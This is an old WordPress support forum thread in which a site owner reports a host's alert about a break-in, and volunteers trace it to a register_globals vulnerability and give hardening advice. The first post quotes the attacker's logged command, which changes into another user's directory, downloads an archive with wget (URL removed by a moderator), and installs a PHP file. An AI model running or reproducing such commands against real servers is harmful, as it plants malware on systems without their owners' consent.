WordPress.org

Ready to get started?Download WordPress

Forums

Hacked (9 posts)

  1. ratinski
    Member
    Posted 8 years ago #

    I received the following email from my host today:

    We have found a vulnerable php script:

    server: server1.whitedns.com
    account: hyoutei
    domain: hyoutei.org
    called URL: http://hyoutei.org/index.php
    executed commands:
    cd /home/brillian/public_html/images ;wget
    [MOD: URL REMOVED zxvf zclass.tgz;mv
    zclass.php z.php;rm -fr zclass.tgz

    They further stated that someone attempted to install malware, and showed me their server logs:

    Aug 13 04:28:13 server1 httpd: EW_EXEC_DENY: IP FILE(/home/hyoutei/public_html/index.php) EXEC(cd /home/brillian/public_html/images ;wget [ MOD: URL REMOVED ] zxvf zclass.tgz;mv zclass.php z.php;rm -fr zclass.tgz) URI(/)

    They told me to contact the developers/check support here at WordPress. Anyone have any advice? Please?

  2. skippy
    Member
    Posted 8 years ago #

    I removed the URL to said malware. No sense showing other script kiddies where to find this junk.

    Tell us about your WordPress installation. What plugins did you use? How many authors did you have?

    Interesting to note that the perpetrator tried to change from your directory to a different user's home directory.

  3. userx
    Member
    Posted 8 years ago #

    <meta name="generator" content="WordPress 1.2" />

    - Would this be the problem?

  4. Mark (podz)
    Support Maven
    Posted 8 years ago #

    The URL above links to <meta name="generator" content="WordPress 1.5.1.3" />

  5. mpsmyth
    Member
    Posted 8 years ago #

    Could be the new vulnerability posted two days ago...

    http://secunia.com/advisories/16386/

  6. In regards to the security vulnerability that Mpsmyth posted, please read these:

    http://wordpress.org/support/topic/41774#post-234660

    http://wordpress.org/support/topic/41464#post-233351

  7. skippy
    Member
    Posted 8 years ago #

    I am in contact with ratinski, and working to determing how the attack occured.

    Please remain calm. Getting alarmed and making wild speculation will do more harm than good. The information provided in the original post only shows what the perpetrator did once they had access. It does not show how that access was obtained. I have requested additional log data, and will review it as soon as I can.

    Until then, please remember to keep security in mind. Use strong passwords. Read up on hardening wordpress. Don't share your login details with anyone. Don't log into your blog from a public computer, or over an unsecured wireless network. Backup regularly.

  8. mpsmyth
    Member
    Posted 8 years ago #

    Thanks... I hadn't been able to find those with the search. Happy now.

  9. skippy
    Member
    Posted 8 years ago #

    After a review of the server logs, it seems pretty clear that the site was compromised by means of the register_globals vulnerability.

    perl and PHP code exists to automate the attack, allowing the attacker to run arbitrary code on the victim's account.

    I'm creating a new thread detailing this issue, and I'll probably make it sticky. Stay tuned.

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags

No tags yet.